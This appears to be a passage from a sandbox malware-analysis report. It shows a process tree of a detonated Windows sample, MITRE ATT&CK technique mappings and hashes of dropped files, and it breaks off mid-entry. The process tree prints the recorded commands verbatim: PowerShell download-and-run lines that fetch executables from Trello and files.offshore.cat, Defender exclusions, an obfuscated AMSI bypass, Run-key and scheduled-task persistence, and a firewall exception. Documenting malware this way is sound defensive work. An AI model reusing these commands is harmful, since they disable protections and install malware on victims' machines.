C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
3⤵
PID:1368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\SysWOW64\timeout.exe
"C:\Windows\system32\timeout.exe" /t 1
5⤵
- Delays execution with timeout.exe
PID:3348

C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"
5⤵
- Executes dropped EXE
PID:3088

C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6088

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "$embr-Ember" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:6112

C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe
"C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5888

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "$embr-Ember" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:5688

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe
4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5696

C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catDSKeOWN1.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catDSKeOWN1.exe.exe"
2⤵
- Executes dropped EXE
PID:5580

C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5868

C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause
4⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191234.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191234.exe.exe"
2⤵
- Executes dropped EXE
PID:5824

C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup8.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup8.exe.exe"
2⤵
- Executes dropped EXE
PID:5876

C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup2.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup2.exe.exe"
2⤵
- Executes dropped EXE
PID:5284

C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD5d2a75Tester.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD5d2a75Tester.exe.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6056

C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6124

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
3⤵
- Creates scheduled task(s)
PID:5832

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"
3⤵
PID:3724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp47FC.tmp.bat""
3⤵
PID:4572

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:5972

C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191111.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191111.exe.exe"
2⤵
- Executes dropped EXE
PID:4956

C:\Users\Admin\AppData\Local\Temp\http88.218.61.219test2.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http88.218.61.219test2.exe.exe"
2⤵
- Executes dropped EXE
PID:5964

C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe" "httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe" ENABLE
3⤵
- Modifies Windows Firewall
PID:5456

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5384

C:\Users\Admin\AppData\Local\Temp\http88.218.61.219555.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http88.218.61.219555.exe.exe"
2⤵
- Executes dropped EXE
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3076 -ip 3076
1⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3076 -ip 3076
1⤵
PID:2508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3076 -ip 3076
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 3076
1⤵
PID:408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 3076
1⤵
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3076 -ip 3076
1⤵
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3076 -ip 3076
1⤵
PID:216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3076 -ip 3076
1⤵
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5572 -ip 5572
1⤵
PID:5880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5544 --field-trial-handle=2268,i,8796662530135712346,11409037572378858775,262144 --variations-seed-version /prefetch:8
1⤵
PID:5344

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5712

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5580

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp386B.tmp.bat""
2⤵
PID:5648

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:6024

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Virtualization/Sandbox Evasion

T1497

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
6195a91754effb4df74dbc72cdf4f7a6

SHA1
aba262f5726c6d77659fe0d3195e36a85046b427

SHA256
3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

SHA512
ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CCR56MZ5\1[1]
Filesize
85KB

MD5
34a87206cee71119a2c6a02e0129718e

SHA1
806643ae1b7685d64c2796227229461c8d526cd6

SHA256
ecea49f9a754af7055b60a860acfd8ce2bc63048c947c9ee6324f07d45c4787d

SHA512
e83b0e003687ebe5d5df5bd405b12b267e07252838d1575dc390b409e03279f9d0ce4a4691971a9601f58d52e55af2fa8ea9596ace4bef246f9ef511b65cdbc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CCR56MZ5\3[1]
Filesize
21KB

MD5
c7aa449a4050a54f67400acf3defd02a

SHA1
e64d746aca3186259f8b7552bf4f6c31b8fa2888

SHA256
dd8f277b22b3da6d4f43af9a5a4bf9515b829d0ffa0a1be6a5ecf5a7e8458b86

SHA512
d3f255641caff4e5c3c49407606155aff5aa9fb01bc586abe7fe54f212fcd531f74b13d55423c282ed59550680b354e9fa53c74d4c5707683e4bc44cd11080ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OZZV2MGD\2[1]
Filesize
14KB

MD5
fce292c79288067dc17919ed588c161c

SHA1
bb44fa2c95af5bbd11e49264a40c16d6f343fa21

SHA256
4ef8146d85d60c2867bdbe44304b5ba00cceb208f4c10c9f91183308e1da3828

SHA512
73dac29753044a720fc43b4ee19d320e06855167cdf0ebf329207aa16faa13fd6d2937bd87b54e544dd8d4c3da634773abd73769d3915154099ff01e6e03033e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
a76f80e16b25c2a742556f5f056210d2

SHA1
d416745be1fdfd426dfe02afe49a0dced4642068

SHA256
afe3430f3920bc4055b9b207e68dce401076b189203d043b52a060ee2e1c0d8c

SHA512
d7ed6d6f8a8475eb5a20e90de7127b7b1c5967bc49482bf83b36d0eb5998de9444cf776fa8f4a3ac002f6f2d52aa55183f017747c46c87afaa81202bce4a0f5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
a649726ca269f263b47dcc949a3f6dbb

SHA1
5921f608cd5b64c915f1e0eec064718bb03fa773

SHA256
645db86ee42fbcabdbe914895dfebaaaf540cf4118b85d1b3746f36e0a2648f2

SHA512
f7825f85d82aec8239bfd0bc6fd72abce68f95232cd38b73a238d31609eea7a9184513173801414cdbb15b57396a7a597b8786727f8ad9536ce235a5930a3132

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
ed0d362a7850d0b9bb6e2e92397403c0

SHA1
6067f5a2d89113dc957f2dcfeae3d535f6f8d15c

SHA256
65eaafb526d4c6023e86b5a3f8e3a9a5b6b8e19d7b19c02c52eeee1f33b6941e

SHA512
05b15d66b55819a695bb089594f41b9bbd6b5633b8c2d0048e859e6cc55e1f1f893a62b23a51fda18e9a7358ecfdf4b7b0b49e118eaf8406436978acbbec3dbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
13af6be1cb30e2fb779ea728ee0a6d67

SHA1
f33581ac2c60b1f02c978d14dc220dce57cc9562

SHA256
168561fb18f8eba8043fa9fc4b8a95b628f2cf5584e5a3b96c9ebaf6dd740e3f

SHA512
1159e1087bc7f7cbb233540b61f1bdecb161ff6c65ad1efc9911e87b8e4b2e5f8c2af56d67b33bc1f6836106d3fea8c750cc24b9f451acf85661e0715b829413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
630a6750931770737d5b52c1de7e647e

SHA1
306a4f22366f2eb85e363311498ba79aa6a53851

SHA256
d7571a0e7ffb481e1758a179351ab24b7f0baf0dcbdf50004dfc0c79af60d909

SHA512
722f9f56e1f895d3a2da61b0dc6705a152d5b414f1274241b9f87ae77b1e45ceccdd46fff7784e3b2c333e8ed21c152f6ff965e7620ac5c69d6be25c6659fab4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
ae80c2751908321053afc34b2045431a

SHA1
2dc49ecda125d201844a85fd12695a69805a9c21

SHA256
dc38704a49ceecd146968aff8e80a6065b3d140cb8ea91c53c9e0cf9a518cdfa

SHA512
f91990daaa922612a2a0123adbc60d4faeceddb1196edb045b6c1bfea12389246f38e9e22e8d62ae3d453f0f89398860bb3d8d54970f047974211a46ef362061

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e2967bd8965bfd1fd7c079c7f07f5c6c

SHA1
e01b51e79b72f51ce35a962d9f56e1c52712fec0

SHA256
7ead4738f5de21c6abecf3199826377ce03691c02f241ac95d7355bae9b667ca

SHA512
02103363b4e3a024dd82acf8cdf20491a1644b18f3617862d03aa4ef3f6762c10f67d1fd01e11656fc5c8a749ff439241ab0ef7138a5fd7b55759a5188a4b7f1

Download Submit
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
Filesize
837KB

MD5
3ecf5cab8e919a5bb0c047bd80e5dfee

SHA1
4abdb1574cec441b1efdea63f1a30b3318bad32e

SHA256
c69fa2eab697e81ab16220fb7cff13f1feed69bb84a9df039920501eb699c7bc

SHA512
3b871383921202e1a06c55ad1774b7403be754fc1e567260867f14e4f2ccc31a9bf6deb9ac22837277cea395f31db7213155318a96beb249e171ec186d25c15f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1002628022.exe
Filesize
85KB

MD5
10ffc145e1c09190a496a0e0527b4f3f

SHA1
e21fba21a11eecb4bc37638f48aed9f09d8912f6

SHA256
80b7e224f28c6160737a313221b9fc94d5f5e933ae1438afef4b5fae33185b2d

SHA512
bec357e73376f2e9e2963db5f7110a4c90de31a94edfaa7bf59c2f01b7bdd0c33e9a8024e995b7f0e67e332bc4aa0ec1280c7c28a24ba554772f8325e1badd1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1793913919.exe
Filesize
21KB

MD5
837d57d98e4afcbe2aa6210240a02c8e

SHA1
56e96962a306a3d5bec484d13a88bcb516ebbca9

SHA256
c72da8d9d76f3ce218c1e072b6752590c7b9fd977acac39a2f0b88d906fa401d

SHA512
58a515bbe9626da5c233fef471278ee79fa517648ff4e95cf9fc221d1215afd6c91d32db0171397940f0935ff230706f1ef3c1284ab4bcdc3c3e1632a4277cbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2321415439.exe
Filesize
8KB

MD5
80f97c916a3eb0e5663761ac5ee1ddd1

SHA1
4ee54f2bf257f9490eaa2c988a5705ef7b11d2bc

SHA256
9e06f61d715b1b88507e3e70390721ab7ab35d70fe2df6edaaf0e565783e7d2f

SHA512
85e30cfc5c02543820f884602701986aa1e40d587da13c35b76b80dc95c0d6b3e18f5b0ad083fcfa3e9b92935306e4f8faec36ac28ac25e53fb03dcba4a092a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2770021532.exe
Filesize
14KB

MD5
2f4ab1a4a57649200550c0906d57bc28

SHA1
94bc52ed3921791630b2a001d9565b8f1bd3bd17

SHA256
baa6149b5b917ea3af1f7c77a65e26a34a191a31a9c79726bd60baf4656701fa

SHA512
ab1a59aa4c48f6c7fcf7950f4a68c3b89a56f266681a5aabd0df947af8340676e209d82ddd1997bfebd972b35ca235233b61231335aec4567f7b031e786ea7e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wfnxth3u.gtc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\http159.253.120.8WEOHnamYnissrv.exe.exe
Filesize
54KB

MD5
e91c0579b42ee928086c94b86e1bff2b

SHA1
eb4596bf9e8116a27a97981bfe0987e9a4cfad9a

SHA256
928b1a849e27a2217c34199889138bb341231c64463e33c53264a50665ad3a99

SHA512
f5f7651f20bfb2542f90d65f663fc730604636b3e44e8eacadaf073169eae6c2e13b5614885bd11616eea438c7a05683ac318caf4a0c06de210a5f6426cccb2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup8.exe.exe
Filesize
523KB

MD5
1111e9594bfe8eadbeea0af21529405b

SHA1
78305398a68d3e4d8113ecdba0b3fc703c9cf1db

SHA256
d87864a983d21cd688db20a3a871e1faf8d3aaea23e54c0388bc448b059c25cf

SHA512
c8c573cdbe7197ae6c53f13ab04d3c41d622f7e7396a6915f95576ce47f1acbc32f65f17063a6d3d44fbb4698ac3c2bcbed3050dd736b079f28b11451153ac82

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.196.8.137tesgs.exe.exe
Filesize
521KB

MD5
068c05b9f062da142d266a374866d3bb

SHA1
315726e1015e1e69cf9645bda713f463e93a8755

SHA256
cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a

SHA512
25358882e596ed9299ef714e2168a70e7bceace7fafc9f61e10e2fb58b480b97f31af86ef08e553cfe69546aa8b056b09df696d5fa9e07e2784392e8bbd87156

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.215.113.46costrandom.exe.exe
Filesize
2.2MB

MD5
f5c067857341d7ae2c37bfdaf6eba67d

SHA1
6b3d740cd7890fa9571234d362792679b8f4d8a2

SHA256
c410153c7fa76bb1c5bf7f6f2549338b19b64ea9e65ad1c680a5612998612770

SHA512
1be78a8bd0cdb8bdbc8a1ef6f6d5f4b438ddab962247c8bb353bceb1493398e02026c142fd7d587d5ccbbf4bcb9aa97abd6eadae8a11b9c154c503919fd38017

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.215.113.46negravegan.exe.exe
Filesize
939KB

MD5
3aae236a68115126ac52a54816a19894

SHA1
fdf5b359dc36df65976133e3f85afb23d0279b8b

SHA256
18dcdd5f689cac6a57439a05f256f213ac5547b2cbef6aa50d2eec82e07f44d4

SHA512
c9cc328e6f47f5ff1718278e956da9eae11a0b13b9dd0a65adc5177b8bbdaaa7888fc42c1e1064c4664050df873bfcad904ff01beffb4bc4ec713ffb91223508

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe
Filesize
84KB

MD5
161a475bfe57d8b5317ca1f2f24b88fa

SHA1
38fa8a789d3d7570c411ddf4c038d89524142c2c

SHA256
98fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54

SHA512
d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
Filesize
9KB

MD5
62b97cf4c0abafeda36e3fc101a5a022

SHA1
328fae9acff3f17df6e9dc8d6ef1cec679d4eb2b

SHA256
e172537adcee1fcdc8f16c23e43a5ac82c56a0347fa0197c08be979438a534ab

SHA512
32bd7062aabd25205471cec8d292b820fc2fd2479da6fb723332887fc47036570bb2d25829acb7c883ccaaab272828c8effbc78f02a3deeabb47656f4b64eb24

Download Submit
C:\Users\Admin\AppData\Local\Temp\http80.94.92.241java.jpg.exe
Filesize
3.2MB

MD5
06c29044529a1f599c024af3487bdafb

SHA1
ce66469fbc68b8f472f1a331c7b05b0ac9a9a874

SHA256
da74bb0561749c9c0215f9a885ea2523aa6e2e956f6972a1a77d3e395144c998

SHA512
83f6f51b2938224e5732c8102c96049c5396e88dff9c14bc5446ee95c555590a393429fc5b6112122d16bcc1898cedeaa134dc935f9b1e5a84cbfc2fa2ed1871

Download Submit
C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191111.exe.exe
Filesize
2.8MB

MD5
e670bdc7c82eee75a6d3ada6a7c9134e

SHA1
b0f0bab6f6e92bc86e86fd7bff93c257a4235859

SHA256
a5cf4844df86abc9222fe436dbc0726e09383a61f4708cdc1a3e8a89cc3540fb

SHA512
7384550bb19ccc11243b79d3bfc9c3f25dce84de64891e7f7eb078b246bfedcd26a958a019a3a7b4ecf5ee1c4e8c8d44790f5c958a58266e5676f3a8e58f4643

Download Submit
C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191234.exe.exe
Filesize
1.3MB

MD5
5e13199a94cf8664e5bfbe2f68d4738e

SHA1
